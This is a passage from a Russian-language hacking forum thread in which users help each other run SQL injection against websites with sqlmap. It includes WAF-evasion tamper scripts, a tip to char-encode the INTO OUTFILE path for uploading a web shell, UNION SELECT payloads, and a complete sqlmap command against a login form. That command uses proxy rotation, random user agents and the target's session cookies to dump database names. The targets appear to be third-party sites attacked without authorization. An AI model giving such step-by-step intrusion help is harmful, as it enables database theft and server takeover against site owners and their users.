HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #461  
Старый 19.06.2017, 17:03
MollizZz
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307

Репутация: 0
По умолчанию

Буду признателен, если кто то нормально объяснить как правильно подбирать тамперы. Или ссылку на понятный мануал по этой теме
 
Ответить с цитированием

  #462  
Старый 20.06.2017, 01:41
ACat
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
Провел на форуме:
60408

Репутация: 0
По умолчанию

выше читай

Bypassing Web Application Firewalls with SQLMap Tamper Scripts

вообще можно загуглить.
 
Ответить с цитированием

  #463  
Старый 26.06.2017, 21:18
danil911
Новичок
Регистрация: 28.03.2014
Сообщений: 21
Провел на форуме:
7519

Репутация: 0
По умолчанию

Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " , (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть),а скулмап его не в состоянии залить, указывать пути не могу по причине того, что не работает слеш ( INTO OUTFILE "путь/до/шелла" ).

Что посоветуете ?
 
Ответить с цитированием

  #464  
Старый 29.06.2017, 11:20
ACat
Участник форума
Регистрация: 10.03.2017
Сообщений: 159
Провел на форуме:
60408

Репутация: 0
По умолчанию

Цитата:
Сообщение от danil911  

Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " , (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть),а скулмап его не в состоянии залить, указывать пути не могу по причине того, что не работает слеш ( INTO OUTFILE "путь/до/шелла" ).
Что посоветуете ?
char encode
 
Ответить с цитированием

  #465  
Старый 01.07.2017, 09:47
v3n0m1
Новичок
Регистрация: 20.12.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Поставить sqlmap, скорость упала, как сохранить данные которые уже скачались из базы? Если просто окно закрыть, вроде как данные все пропадут...
 
Ответить с цитированием

  #466  
Старый 01.07.2017, 13:07
r00t_hack
Новичок
Регистрация: 01.07.2017
Сообщений: 7
Провел на форуме:
2595

Репутация: 0
По умолчанию

as my self SQLmap better than havij.
 
Ответить с цитированием

  #467  
Старый 10.07.2017, 19:39
=HALK=
Новичок
Регистрация: 30.10.2008
Сообщений: 12
Провел на форуме:
24552

Репутация: 17
По умолчанию

Цитата:
Сообщение от Vald  

Подскажите, что делает параметр --no-cast? По мануалу не могу понять.
Type cast - приведение типов.

sqlmapпо умолчанию использует приведение типов данных к строковым значениям для удобного отображения результата в консоли.

Но не всегда этот механизм необходим, в некоторых случаях данные не будут корректно приведены к строковому типу.

Для наглядности работы механизма можно рассмотреть запросы к MySQL, которые генерирует sqlmap:

a) без параметра --no-cast

Цитата:
Сообщение от None  
1' UNION SELECT CONCAT(0x3a,
IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)
,0x3a)
б) с параметром --no-cast

Цитата:
Сообщение от None  
1' UNION SELECT CONCAT(0x3a,
CURRENT_USER()
,0x3a)
 
Ответить с цитированием

  #468  
Старый 11.07.2017, 10:05
SadBlackFox
Новичок
Регистрация: 02.07.2017
Сообщений: 3
Провел на форуме:
1083

Репутация: 0
По умолчанию

Не получается раскрутить уязвимость(это же уязвимость?)

Ошибка: https://s8.hostingkartinok.com/uploa...115e042fec.png

POST такой:

.SpoilerTarget" type="button">Spoiler
Заголовки:

Код:
Host: site.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: site.ru/page
Cookie: __cfduid=d6db872199804f625c490305153453b1b1499733704; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Тело:

Код:
Content-Type: multipart/form-data; boundary=---------------------------29948882417335
Content-Length: 249

-----------------------------29948882417335
Content-Disposition: form-data; name="email"

'
-----------------------------29948882417335
Content-Disposition: form-data; name="password"

00000000
-----------------------------29948882417335--
Пытаюсь вот так, я наверное неправильно --data оформляю

Код:
sqlmap.py -u "site.ru/page" --proxy-file="proxy.txt" --random-agent --time-sec=10 --delay=1 --tamper="between,randomcase,space2comment" --dbms=mysql --level=5 --risk=1 -v3 --data="???"
 
Ответить с цитированием

  #469  
Старый 11.07.2017, 13:46
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от SadBlackFox  

Не получается раскрутить уязвимость(это же уязвимость?)
-u "site.ru/page" --proxy-file="proxy.txt" --random-agent --tamper="between,randomcase,space2comment" --cookie="__cfduid=d6db872199804f625c490305153453b1b 1499733704; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423" -v 3 --data "password=123&email=123" -p email --dbs
 
Ответить с цитированием

  #470  
Старый 12.07.2017, 23:38
SadBlackFox
Новичок
Регистрация: 02.07.2017
Сообщений: 3
Провел на форуме:
1083

Репутация: 0
По умолчанию

Ковыряю я ковыряю, и не могу никак выковырять...

Пишет такое: https://goo.gl/xBLfpu

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.